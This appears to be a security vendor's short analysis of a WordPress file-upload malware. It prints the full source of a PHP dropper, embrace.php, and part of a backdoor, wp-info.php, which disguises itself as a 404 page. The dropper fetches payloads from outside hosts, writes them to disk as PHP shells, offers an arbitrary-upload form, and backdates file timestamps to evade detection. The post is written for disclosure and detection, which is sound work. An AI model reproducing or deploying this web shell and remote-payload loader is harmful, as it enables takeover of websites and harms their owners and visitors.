In WordPress themes there are lots of file upload vulnerabilities.
This trying upload embrace.php file to server and execute it
embrace.php
error_reporting(-1);
function fetch_url($url) {
$contents = false;
$errs = 0;
while ( !$contents && ($errs++ < 3) )
{
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1';
if (extension_loaded('curl') && function_exists('curl_init')) {
$c = curl_init($url);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
$contents = @file_get_contents($url, false, $context);
}
}
return $contents;
}
$test=$_SERVER['DOCUMENT_ROOT'];
if(isset($_REQUEST['doit'])){
if (file_exists("$test/wp-info.php")){
echo "Teddy already in place";
}
else{
$link = fetch_url("http://www.wayiview.com/license.txt");
file_put_contents("$test/wp-info.php", $link);
echo "Teddy-done";
}
}
elseif(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2888888';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
echo"<center><b>Done ==> <a href='./$userfile_name'>$userfile_name</a></b></center>";
}
}
else{
echo '<b>'.php_uname().'</b>';
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
}
elseif(isset($_REQUEST['f3'])){
$dom = array_rand(array_flip(array("ml", "cf", "ga", "gq", "cu.cc")), 1);
$shname3 = uniqid();
$f3 = fetch_url("http://comxvas.$dom/3.txt");
$shnam3 = ("./$shname3.php");
file_put_contents($shnam3, $f3);
echo"<center><b>Done ==> <a href='./".$shname3.".php'>".$shname3.".php</a></b></center>";
touch("./$shname3.php", time() - mt_rand(60*60*24*30, 60*60*24*365));
}
else {
echo "Teddy-is-here";
}
wp-info.php
This malware can infect more and more malwares to server and get full control it.
function fetch_url($url) {
$contents = false;
$errs = 0;
while ( !$contents && ($errs++ < 3) )
{
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/43.1 googlebot';
if (extension_loaded('curl') && function_exists('curl_init')) {
$c = curl_init($url);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
curl_close($c);
} else
{
$options = array('http' => array('user_agent' => $user_agent));
$context = stream_context_create($options);
$contents = @file_get_contents($url, false, $context);
}
}
return $contents;
}
if(isset($_REQUEST['up'])){
if(isset($_POST['Submit'])){
.
.
.
}
else{
echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<h1>Not Found (404)</h1>
The requested URL ";
echo $_SERVER['REQUEST_URI'];
echo "
was not found on this server.
<hr>
";
echo $_SERVER['SERVER_NAME'];
}
Final words
Websites that using Malware Expert – ModSecurity rules are protected against this attack.
Use Malware Expert – Signatures detect this malware from files for FREE!